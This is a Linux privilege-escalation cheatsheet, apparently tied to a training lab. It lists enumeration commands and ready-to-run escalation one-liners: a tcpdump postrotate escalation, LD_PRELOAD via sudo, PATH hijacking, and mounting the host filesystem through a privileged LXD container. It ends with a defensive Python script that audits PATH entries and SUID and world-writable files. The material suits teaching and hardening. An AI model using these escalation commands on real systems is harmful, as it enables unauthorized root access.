Linux Privilege Escalation Cheatsheet
Linux privilege escalation is a critical security concern: it involves exploiting vulnerabilities or misconfigurations to gain elevated access to a system. The same mechanisms serve authorized users performing administrative tasks and attackers compromising a system's security. Authorized users typically use tools like sudo to temporarily elevate their privileges for specific tasks, such as system configuration or software installation. Attackers, by contrast, exploit weaknesses in the system, such as kernel vulnerabilities, misconfigured services, or loose file permissions, to escalate from a limited user account to the root account. This can lead to severe consequences, including data theft, malware deployment, and system damage. Understanding the methods of privilege escalation is essential for both ethical hackers and system administrators so they can harden systems and prevent unauthorized access.
Linux
| Command | Description |
|---|---|
| `ssh htb-student@` | SSH to lab target |
| `ps aux \| grep root` | View processes running as root |
| `ps au` | See logged in users |
| `ls /home` | View user home directories |
| `ls -l ~/.ssh` | Check for SSH keys for current user |
| `history` | Check the current user's Bash history |
| `sudo -l` | Can the user run anything as another user? |
| `ls -la /etc/cron.daily` | Check for daily Cron jobs |
| `lsblk` | Check for unmounted file systems/drives |
| `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null` | Find world-writable directories |
| `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null` | Find world-writable files |
| `uname -a` | Check the kernel version |
| `cat /etc/lsb-release` | Check the OS version |
| `gcc kernel_exploit.c -o kernel_exploit` | Compile an exploit written in C |
| `screen -v` | Check the installed version of Screen |
| `./pspy64 -pf -i 1000` | View running processes with pspy |
| `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null` | Find root-owned binaries with the SUID bit set |
| `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null` | Find root-owned binaries with both the SUID and SETGID bits set |
| `sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root` | Priv esc with tcpdump |
| `echo $PATH` | Check the current user's PATH variable contents |
| `PATH=.:${PATH}` | Add a `.` to the beginning of the current user's PATH |
| `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null` | Search for config files |
| `ldd /bin/ls` | View the shared objects required by a binary |
| `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart` | Escalate privileges using LD_PRELOAD |
| `readelf -d payroll \| grep PATH` | Check a binary's dynamic section for RPATH/RUNPATH entries |
| `gcc src.c -fPIC -shared -o /development/libshared.so` | Compile a shared library |
| `lxd init` | Start the LXD initialization process |
| `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine` | Import a local image |
| `lxc init alpine r00t -c security.privileged=true` | Start a privileged LXD container |
| `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true` | Mount the host file system in a container |
| `lxc start r00t` | Start the container |
| `showmount -e 10.129.2.12` | Show the NFS export list |
| `sudo mount -t nfs 10.129.2.12:/tmp /mnt` | Mount an NFS share locally |
| `tmux -S /shareds new -s debugsess` | Create a shared tmux session socket |
| `./lynis audit system` | Perform a system audit with Lynis |
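The PATH, SUID/SGID and world-writable checks in the table are exactly what an administrator should audit for before an attacker does. The script below is an added example, not part of the original cheatsheet: it reproduces those `find` and `echo $PATH` checks as a small Python audit so the results can be reviewed or fed into a baseline, with the `-perm` tests expressed as `stat` bit tests. The function and label names are this example's own.

```python
"""Audit helpers mirroring the cheatsheet's PATH, SUID/SGID and -o+w checks.
Constructed example for defenders; not from the original cheatsheet."""
import os
import stat
from typing import Dict, List


def path_risks(path_value: str) -> List[str]:
    """Return PATH entries that let a binary in the current directory shadow
    a system one: '.', an empty component (also means 'current dir') and any
    relative directory. Matches what 'PATH=.:${PATH}' introduces."""
    risky = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            risky.append(entry or "<empty>")
        elif not entry.startswith("/"):
            risky.append(entry)
    return risky


def mode_findings(mode: int, owner_uid: int) -> List[str]:
    """Classify an st_mode the way the find commands do:
    -user root -perm -4000 -> root-suid, -perm -2000 -> sgid,
    -perm -o+w -> world-writable (sticky dirs such as /tmp flagged apart)."""
    findings = []
    if mode & stat.S_ISUID and owner_uid == 0:
        findings.append("root-suid")
    if mode & stat.S_ISGID:
        findings.append("sgid")
    if mode & stat.S_IWOTH:
        if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
            findings.append("world-writable-sticky")
        else:
            findings.append("world-writable")
    return findings


def audit_tree(root: str) -> Dict[str, List[str]]:
    """Walk a tree (pruning /proc like '-path /proc -prune') and map each
    path that has a finding to its list of findings."""
    report: Dict[str, List[str]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == "/proc" or dirpath.startswith("/proc/"):
            dirnames[:] = []  # do not descend into procfs
            continue
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # vanished or unreadable entry
            hits = mode_findings(st.st_mode, st.st_uid)
            if hits:
                report[full] = hits
    return report
```

Run `audit_tree("/")` as root for a full-system pass, or on a single directory such as `/usr/local` to review a deployment; compare successive reports to catch newly introduced SUID binaries or writable paths.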